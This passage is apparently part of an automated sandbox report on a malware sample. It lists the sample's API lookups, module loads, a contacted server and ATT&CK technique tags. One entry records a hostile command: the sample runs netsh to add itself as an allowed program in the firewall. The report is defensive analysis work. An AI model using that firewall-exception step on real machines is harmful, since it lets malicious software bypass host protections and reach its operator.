\"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" called \"GetProcAddress\" with a parameter GetFileType (UID: 00000000-00005756)\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" called \"GetProcAddress\" with a parameter SHGetFolderPath (UID: 00000000-00005756)\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" called \"GetProcAddress\" with a parameter WriteFile (UID: 00000000-00005756)\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" called \"GetProcAddress\" with a parameter ReleaseMutex (UID: 00000000-00005756)\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" called \"GetProcAddress\" with a parameter CreateMutex (UID: 00000000-00005756)\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" called \"GetProcAddress\" with a parameter CreateMutexW (UID: 00000000-00005756)\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" called \"GetProcAddress\" with a parameter lstrlen (UID: 00000000-00005756)\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" called \"GetProcAddress\" with a parameter lstrlenW (UID: 00000000-00005756)\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" called \"GetProcAddress\" with a parameter RegCloseKey (UID: 00000000-00005756)\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" called \"GetProcAddress\" with a parameter RegOpenKeyEx (UID: 00000000-00005756)\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" called \"GetProcAddress\" with a parameter RegOpenKeyExW (UID: 00000000-00005756)\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" called \"GetProcAddress\" with a parameter RegQueryValueEx (UID: 00000000-00005756)\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" called \"GetProcAddress\" with a parameter RegQueryValueExW (UID: 00000000-00005756)\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" called \"GetProcAddress\" with a parameter RegSetValueEx (UID: 00000000-00005756)\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" called \"GetProcAddress\" with a parameter RegSetValueExW (UID: 00000000-00005756)\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" called \"GetProcAddress\" with a parameter SendMessageTimeout (UID: 00000000-00005756)\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" called \"GetProcAddress\" with a parameter SendMessageTimeoutA (UID: 00000000-00005756)\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" called \"GetProcAddress\" with a parameter GetStartupInfo (UID: 00000000-00005756)\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" called \"GetProcAddress\" with a parameter GetStartupInfoW (UID: 00000000-00005756)\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" called \"GetProcAddress\" with a parameter CreateProcess (UID: 00000000-00005756)\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" called \"GetProcAddress\" with a parameter CreateProcessW (UID: 00000000-00005756)\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" called \"GetProcAddress\" with a parameter WaitForSingleObject (UID: 00000000-00005756)\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" called \"GetProcAddress\" with a parameter GetACP (UID: 00000000-00005756)\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" called \"GetProcAddress\" with a parameter UnmapViewOfFile (UID: 00000000-00005756)\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" called \"GetProcAddress\" with a parameter GetEnvironmentVariable (UID: 00000000-00005756)\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" called \"GetProcAddress\" with a parameter GetEnvironmentVariableW (UID: 00000000-00005756)\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" called \"GetProcAddress\" with a parameter RegisterWindowMessage (UID: 00000000-00005756)\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" called \"GetProcAddress\" with a parameter RegisterWindowMessageW (UID: 00000000-00005756)\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" called \"GetProcAddress\" with a parameter GetSystemMetrics (UID: 00000000-00005756)\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" called \"GetProcAddress\" with a parameter GetModuleHandle (UID: 00000000-00005756)\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" called \"GetProcAddress\" with a parameter GetModuleHandleW (UID: 00000000-00005756)\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" called \"GetProcAddress\" with a parameter GetProcAddress (UID: 00000000-00005756)\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" called \"GetProcAddress\" with a parameter DefWindowProcW (UID: 00000000-00005756)\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" called \"GetProcAddress\" with a parameter GetStockObject (UID: 00000000-00005756)\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" called \"GetProcAddress\" with a parameter RegisterClass (UID: 00000000-00005756)\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" called \"GetProcAddress\" with a parameter RegisterClassW (UID: 00000000-00005756)\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" called \"GetProcAddress\" with a parameter CoTaskMemAlloc (UID: 00000000-00005756)\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" called \"GetProcAddress\" with a parameter CoTaskMemFree (UID: 00000000-00005756)\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" called \"GetProcAddress\" with a parameter CreateWindowEx (UID: 00000000-00005756)\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" called \"GetProcAddress\" with a parameter CreateWindowExW (UID: 00000000-00005756)\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" called \"GetProcAddress\" with a parameter SetWindowLong (UID: 00000000-00005756)\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" called \"GetProcAddress\" with a parameter SetWindowLongW (UID: 00000000-00005756)\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" called \"GetProcAddress\" with a parameter GetWindowLong (UID: 00000000-00005756)\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" called \"GetProcAddress\" with a parameter GetWindowLongW (UID: 00000000-00005756)\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" called \"GetProcAddress\" with a parameter CallWindowProc (UID: 00000000-00005756)\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" called \"GetProcAddress\" with a parameter CallWindowProcW (UID: 00000000-00005756)\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" called \"GetProcAddress\" with a parameter GetClientRect (UID: 00000000-00005756)\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" called \"GetProcAddress\" with a parameter GetWindowRect (UID: 00000000-00005756)\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" called \"GetProcAddress\" with a parameter GetParent (UID: 00000000-00005756)\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" called \"GetProcAddress\" with a parameter CoRegisterMessageFilter (UID: 00000000-00005756)\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" called \"GetProcAddress\" with a parameter PeekMessage (UID: 00000000-00005756)\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" called \"GetProcAddress\" with a parameter PeekMessageW (UID: 00000000-00005756)\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" called \"GetProcAddress\" with a parameter GetCurrentProcessId (UID: 00000000-00005756)\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" called \"GetProcAddress\" with a parameter GetCurrentProcessIdW (UID: 00000000-00005756)\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" called \"GetProcAddress\" with a parameter LookupPrivilegeValue (UID: 00000000-00005756)\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" called \"GetProcAddress\" with a parameter LookupPrivilegeValueW (UID: 00000000-00005756)\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" called \"GetProcAddress\" with a parameter OpenProcessTokenW (UID: 00000000-00005756)\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" called \"GetProcAddress\" with a parameter AdjustTokenPrivileges (UID: 00000000-00005756)\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" called \"GetProcAddress\" with a parameter AdjustTokenPrivilegesW (UID: 00000000-00005756)\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" called \"GetProcAddress\" with a parameter OpenProcess (UID: 00000000-00005756)\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" called \"GetProcAddress\" with a parameter OpenProcessW (UID: 00000000-00005756)\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" called \"GetProcAddress\" with a parameter GetExitCodeProcess (UID: 00000000-00005756)\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" called \"GetProcAddress\" with a parameter GetExitCodeProcessW (UID: 00000000-00005756)\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" called \"GetProcAddress\" with a parameter GetProcessWorkingSetSize (UID: 00000000-00005756)\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" called \"GetProcAddress\" with a parameter GetProcessWorkingSetSizeW (UID: 00000000-00005756)\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" called \"GetProcAddress\" with a parameter SetProcessWorkingSetSize (UID: 00000000-00005756)\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" called \"GetProcAddress\" with a parameter SetProcessWorkingSetSizeW (UID: 00000000-00005756)\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" called \"GetProcAddress\" with a parameter GetCurrentProcessW (UID: 00000000-00005756)\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" called \"GetProcAddress\" with a parameter GetFileAttributesEx (UID: 00000000-00005756)\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" called \"GetProcAddress\" with a parameter GetFileAttributesExW (UID: 00000000-00005756)\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" called \"GetProcAddress\" with a parameter GetFileSize (UID: 00000000-00005756)\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" called \"GetProcAddress\" with a parameter ReadFile (UID: 00000000-00005756)\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" called \"GetProcAddress\" with a parameter ND_RI2 (UID: 00000000-00005756)\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" called \"GetProcAddress\" with a parameter ND_RI2_RetAddr (UID: 00000000-00005756)\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" called \"GetProcAddress\" with a parameter WSAStartup (UID: 00000000-00005756)\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" called \"GetProcAddress\" with a parameter WSASocket (UID: 00000000-00005756)\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" called \"GetProcAddress\" with a parameter WSASocketW (UID: 00000000-00005756)\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" called \"GetProcAddress\" with a parameter setsockopt (UID: 00000000-00005756)\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" called \"GetProcAddress\" with a parameter WSAEventSelect (UID: 00000000-00005756)\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" called \"GetProcAddress\" with a parameter ioctlsocket (UID: 00000000-00005756)\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" called \"GetProcAddress\" with a parameter closesocket (UID: 00000000-00005756)\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" called \"GetProcAddress\" with a parameter GetComputerName (UID: 00000000-00005756)\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" called \"GetProcAddress\" with a parameter GetComputerNameW (UID: 00000000-00005756)\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" called \"GetProcAddress\" with a parameter ConvertStringSecurityDescriptorToSecurityDescriptor (UID: 00000000-00005756)\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" called \"GetProcAddress\" with a parameter ConvertStringSecurityDescriptorToSecurityDescriptorW (UID: 00000000-00005756)\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" called \"GetProcAddress\" with a parameter LocalFree (UID: 00000000-00005756)\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" called \"GetProcAddress\" with a parameter CreateFileMapping (UID: 00000000-00005756)\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" called \"GetProcAddress\" with a parameter CreateFileMappingW (UID: 00000000-00005756)\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" called \"GetProcAddress\" with a parameter MapViewOfFile (UID: 00000000-00005756)\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" called \"GetProcAddress\" with a parameter VirtualQuery (UID: 00000000-00005756)\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" called \"GetProcAddress\" with a parameter CreateWellKnownSid (UID: 00000000-00005756)\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" called \"GetProcAddress\" with a parameter CreateWellKnownSidW (UID: 00000000-00005756)\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" called \"GetProcAddress\" with a parameter OpenMutex (UID: 00000000-00005756)\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" called \"GetProcAddress\" with a parameter OpenMutexW (UID: 00000000-00005756)\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" called \"GetProcAddress\" with a parameter GetProcessTimes (UID: 00000000-00005756)\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" called \"GetProcAddress\" with a parameter GetProcessTimesW (UID: 00000000-00005756)\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" called \"GetProcAddress\" with a parameter inet_addr (UID: 00000000-00005756)\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" called \"GetProcAddress\" with a parameter WSAConnect (UID: 00000000-00005756)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00005928)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter InitHelperDll (UID: 00000000-00005928)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter RegQueryValueExW (UID: 00000000-00005928)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter CoInitializeEx (UID: 00000000-00005928)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter ThemeInitApiHook (UID: 00000000-00005928)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter IsProcessDPIAware (UID: 00000000-00005928)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter CryptEnumProvidersW (UID: 00000000-00005928)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter LoadStringW (UID: 00000000-00005928)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter RegCreateKeyExW (UID: 00000000-00005928)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter RegOpenKeyExW (UID: 00000000-00005928)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter RegCloseKey (UID: 00000000-00005928)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter OpenSCManagerW (UID: 00000000-00005928)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter OpenServiceW (UID: 00000000-00005928)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter QueryServiceConfigW (UID: 00000000-00005928)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter CloseServiceHandle (UID: 00000000-00005928)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter QueryServiceStatus (UID: 00000000-00005928)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter RegQueryInfoKeyW (UID: 00000000-00005928)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter RegEnumKeyExW (UID: 00000000-00005928)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter CoTaskMemFree (UID: 00000000-00005928)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter LookupAccountSidLocalW (UID: 00000000-00005928)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter OpenThreadToken (UID: 00000000-00005928)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter OpenProcessToken (UID: 00000000-00005928)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter GetTokenInformation (UID: 00000000-00005928)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter AllocateAndInitializeSid (UID: 00000000-00005928)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter EqualSid (UID: 00000000-00005928)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter FreeSid (UID: 00000000-00005928)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter SystemFunction036 (UID: 00000000-00005928)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter HttpInitialize (UID: 00000000-00005928)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter RegisterGPNotification (UID: 00000000-00005928)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter UnregisterGPNotification (UID: 00000000-00005928)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter GetHashInterface (UID: 00000000-00005928)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter GetCipherInterface (UID: 00000000-00005928)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter SetThreadUILanguage (UID: 00000000-00005928)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter CreateWellKnownSid (UID: 00000000-00005928)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter LookupAccountSidW (UID: 00000000-00005928)", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-8", "type": 6, "relevance": 1, "name": "Looks up procedures from modules (excluding apphelp.dll, kernel32.dll, user32.dll, gdi32.dll, ole32.dll, comctl32.dll, uxtheme.dll, oleaut32.dll, version.dll, msctfime.ime)", "description": "\"15001600c03eb46b@ADVAPI32.dll\"\n \"0e000f00703fb46b@ADVAPI32.dll\"\n \"0e000f00cc3fb46b@ADVAPI32.dll\"\n \"11001200b447b46b@ADVAPI32.dll\"\n \"110012004848b46b@ADVAPI32.dll\"\n \"120013008c48b46b@ADVAPI32.dll\"\n \"12001300e448b46b@ADVAPI32.dll\"\n \"14001500386eb46b@ADVAPI32.dll\"\n \"14001500506eb46b@ADVAPI32.dll\"\n \"14001500686eb46b@ADVAPI32.dll\"\n \"17001800806eb46b@ADVAPI32.dll\"\n \"0d000e00986eb46b@ADVAPI32.dll\"\n \"11001200a86eb46b@ADVAPI32.dll\"\n \"11001200bc6eb46b@ADVAPI32.dll\"\n \"0f001000fc6fb46b@ADVAPI32.dll\"\n \"140015003c70b46b@ADVAPI32.dll\"\n \"140015005470b46b@ADVAPI32.dll\"\n \"0c000d009c70b46b@ADVAPI32.dll\"\n \"0c000d00ac70b46b@ADVAPI32.dll\"\n \"0e000f00bc70b46b@ADVAPI32.dll\"\n \"0e000f00cc70b46b@ADVAPI32.dll\"\n \"0b000c00dc70b46b@ADVAPI32.dll\"\n \"180019001473b46b@RPCRT4.dll\"\n \"130014004073b46b@RPCRT4.dll\"\n \"140015005473b46b@RPCRT4.dll\"", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "string-625", "type": 2, "relevance": 1, "name": "References Windows filepaths for DLLs (possible dropped files)", "description": "Observed system executable string:\"%WINDIR%\\Microsoft.NET\\Framework\\v2.0.50727\\mscorwks.dll\" [Source: 00000000-00005756-00000C28-44267471]\n Observed system executable string:\"%WINDIR%\\assembly\\NativeImages_v2.0.50727_32\\mscorlib\\9f895c66454577eff9c77442d0c84f71\\mscorlib.ni.dll\" [Source: 00000000-00005756-00000C28-45191107]\n Observed system executable string:\"%WINDIR%\\Microsoft.NET\\Framework\\v2.0.50727\\ole32.dll\" [Source: 00000000-00005756-00000C28-45275550]\n Observed system executable string:\"%WINDIR%\\system32\\uxtheme.dll\" [Source: 00000000-00005756-00000C28-45415365]\n Observed system executable string:\"%WINDIR%\\Microsoft.NET\\Framework\\v2.0.50727\\mscorjit.dll\" [Source: 00000000-00005756-00000C28-46004973]\n Observed system executable string:\"%WINDIR%\\assembly\\NativeImages_v2.0.50727_32\\System\\ad92dab7f418877d6a1e0358ce35658a\\System.ni.dll\" [Source: 00000000-00005756-00000C28-46109112]\n Observed system executable string:\"%WINDIR%\\assembly\\NativeImages_v2.0.50727_32\\Microsoft.VisualBas#\\6f5bf6427122bfc30b5be76bcd651018\\Microsoft.VisualBasic.ni.dll\" [Source: 00000000-00005756-00000C28-46185458]\n Observed system executable string:\"%WINDIR%\\assembly\\NativeImages_v2.0.50727_32\\System.Drawing\\ce3c98f2bf220ef17b0cf4233cac6ceb\\System.Drawing.ni.dll\" [Source: 00000000-00005756-00000C28-46460142]\n Observed system executable string:\"%WINDIR%\\assembly\\NativeImages_v2.0.50727_32\\System.Windows.Forms\\367e5b8a038ac76eba17528bb7b3688e\\System.Windows.Forms.ni.dll\" [Source: 00000000-00005756-00000C28-48268437]\n Observed system executable string:\"%WINDIR%\\assembly\\NativeImages_v2.0.50727_32\\System.Configuration\\ad8dd536906e94c4bc9cb9b82285580b\\System.Configuration.ni.dll\" [Source: 00000000-00005756-00000C28-58727248]\n Observed system executable string:\"%WINDIR%\\assembly\\NativeImages_v2.0.50727_32\\System.Xml\\77c1dc46ea139bf5e1eaa9b87ef03c7a\\System.Xml.ni.dll\" [Source: 00000000-00005756-00000C28-59864920]\n Observed system executable string:\"%WINDIR%\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\ws2_32.dll\" [Source: 00000000-00005756-00000C28-61194102]\n Observed system executable string:\"%WINDIR%\\system32\\bcryptprimitives.dll\" [Source: 00000000-00005928-00000C28-63023078]", "origin": "File/Memory", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-122", "type": 6, "relevance": 3, "name": "Calls an API typically used to create a directory", "description": "\"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" called \"CreateDirectoryW\" with parameter C:\\Users\\%OSUSER% (UID: 00000000-00005756)\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" called \"CreateDirectoryW\" with parameter %USERPROFILE%\\AppData\\Roaming (UID: 00000000-00005756)", "origin": "API Call", "attck_id": "T1074.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1074/001"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-128", "type": 6, "relevance": 5, "name": "Calls an API typically used to create a process", "description": "\"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" called \"CreateProcessW\" with parameter \"netsh firewall add allowedprogram \"C:\\be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" \"be71563bc45bed64a8291\" - (UID: 00000000-00005756)", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "network-1", "type": 7, "relevance": 1, "name": "Contacts server", "description": "\"<IPv4>:24206\"", "origin": "Network Traffic", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-22", "type": 6, "relevance": 1, "name": "Fails to load modules at runtime", "description": "\"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" failed to load missing module \"api-ms-win-appmodel-runtime-l1-1-0.dll\" - [base:0; Status:c0000135]\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" failed to load missing module \"%WINDIR%\\Microsoft.NET\\Framework\\v2.0.50727\\ole32.dll\" - [base:0; Status:c0000135]\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" failed to load missing module \"%WINDIR%\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\ws2_32.dll\" - [base:0; Status:c0000135]", "origin": "API Call", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-80", "relevance": 1, "name": "PE file contains executable sections", "description": "\"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a\" has an executable section named \".text\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-7", "type": 6, "relevance": 1, "name": "Loads modules at runtime", "description": "\"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" loaded module \"API-MS-WIN-APPMODEL-RUNTIME-L1-1-0.DLL\" at base 0\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" loaded module \"VERSION.DLL\" at base 750d0000\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" loaded module \"%WINDIR%\\MICROSOFT.NET\\FRAMEWORK\\V2.0.50727\\MSCORWKS.DLL\" at base 65470000\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" loaded module \"USER32.DLL\" at base 77710000\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" loaded module \"MSCOREE.DLL\" at base 6c300000\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" loaded module \"NTDLL\" at base 77d30000\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" loaded module \"ADVAPI32.DLL\" at base 76260000\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" loaded module \"SHELL32.DLL\" at base 76620000\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" loaded module 